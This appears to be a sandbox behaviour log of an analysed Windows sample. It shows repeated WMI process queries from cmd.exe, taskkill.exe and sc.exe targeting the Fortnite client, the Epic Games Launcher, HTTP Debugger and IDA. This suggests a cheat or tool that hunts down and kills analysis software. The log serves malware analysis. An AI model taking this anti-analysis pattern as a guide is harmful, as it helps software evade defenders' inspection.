Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "HTTPDebuggerUI.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "HTTPDebugger.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "HTTPDebuggerSvc.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "HTTPDebuggerSvc.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "HTTPDebuggerUI.exe")
Source: C:\Windows\System32\sc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\sc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "HTTPDebuggerUI.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "Ida64.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "HTTPDebuggerUI.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "HTTPDebuggerSvc.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\sc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
Source: C:\Windows\SysWOW64\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "HTTPDebuggerSvc.exe")
